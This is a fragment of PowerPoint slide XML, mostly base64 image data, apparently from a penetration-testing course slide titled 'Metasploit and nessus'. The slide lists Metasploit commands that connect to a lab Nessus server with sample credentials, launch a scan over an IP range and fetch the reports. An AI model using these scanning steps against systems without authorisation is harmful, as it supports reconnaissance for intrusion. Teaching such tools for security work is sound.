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782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2426" y="457201"/>
            <a:ext cx="8181974" cy="1219200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nessus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7975" y="1143000"/>
            <a:ext cx="8181974" cy="5029200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &gt; load </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nessus</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nessus_connect</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	student1:password@192.168.20.103 ok (ok says no </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ssl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is ok)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nessus_policy_list</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nessus_scan_new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pwnage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> range&gt; (scan using policy one, 	name it </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pwnage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nessus_report_list</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nessus_report_get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &lt;report id&gt;</a:t>
            </a:r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</p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="AutoShape 4" descr="data:image/jpeg;base64,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9" descr="data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wCEAAkGBhQREBQUEhIVFRIWFRQUFBUUERUUFBYVFhQVGBUUFRQXHCYeFxojGhUUHy8gIycqLCwsFx4xNTAqNSYrLCoBCQoKDgwOGg8PGiwkHyQpLCksLCwsLCwsLCwpLCksLCksLCwsLCksLCwsLCksLCwsLCksLCkpLCwsLCksLCwsLP/AABEIAOEA4QMBIgACEQEDEQH/xAAcAAABBQEBAQAAAAAAAAAAAAAAAwQFBgcCAQj/xABHEAACAQIDBAYHBAkCBAcBAAABAgMAEQQSIQUGMUETIlFhcZEHMlKBobHBFCNy0TNCYoKissLh8BVzNIOS8SREU2OTs9Il/8QAGQEAAwEBAQAAAAAAAAAAAAAAAAIDAQQF/8QAJREAAgICAwACAgIDAAAAAAAAAAECESExAxJBIlEEE5GhQmFx/9oADAMBAAIRAxEAPwDcaKKKACiiigAooooAKK8LW41E4rb4vliXpG7f1R7+f+a1tWY3RLE1H4nb0SaZsx7F1+PD41GPhpJdZnNvYXQfl86XhwiJ6qgd/E+ZraMtg23JX/Rw2Ha5/wC1JMcS3rShe5R+Q+tO6pm7O/7YraE+FkhWMJ0oiYOWLmGTLIDew4ENYDkeNMl9GP8A2WQ7MLetNIfefqTXn+ipzLH3j8qpO/G3cZHjpI4MSYkTAti0URRPmeNmzKS6k2Kq3lTzereOU7AGKjcxzPFhnzRkqQzvHnynkNWHhTU8C2i1f6Ina3mPyr0bLI9WWQfvflaq1uLj5/teOw0s8kyQHDmNpbGQdLGWYFgBccOPZVwxM4jRnb1UVnPgoJPwFK7To1U1Y3VcQvqzX7mF/nelU2xOnrxBh2obH61RdzN/sTiJsNHiYorYqKWWNos6sgiZ1+8RiRY9G1iD2VYNtb+YTB4gQTuyN0YkLCNmRVLFRnK3K8Oy2o1rXF6BNbLLht4Ym0JKHsYWHnw86klcEXBuO0aioR4VkFyARa4NuXjxFNlwLRm8Llf2TqD/AJ30lIa2WWioXD7fKnLOuU+0NVP+d16mI5AwBBBB4EG4rGqNTs6ooorDQooooAKKKKACiiigAooooAKKKKACmuO2ikQux15KOJ/ztpHae1RH1VGaQ8B2d5/Ko6DCEtnkOZz28B4VqRjZzKZMRq5yR8kHPx/v5U32xtnD4CAyzNkjBC6KWZmN7KANSTY8eyoDeT0jQwCPoj0kTySQS4iIh/s8gXjksc7C+a3AhGteudiTDamz5sJimDToOhldbENpmgxSW4hgFcHnY8jVK9Yl/RLY3GT4nZ0kmHSXDYho3aJZFXpQVJKgqbgF1HiM3dVI9HO8ZOMjX7U0seIwweRJ8RneLFIxVlUMb9fKSFGtmHs3qY9GeOxDNPFi8STJhMuHMBRQqqtss5k9ZycpFzy8RVY3j3blixWJw2Hw8jtJNDjsFJGgtDJnIkDyGwRPW4njGnbTpbQrembJWJbRxMmF2jiMQs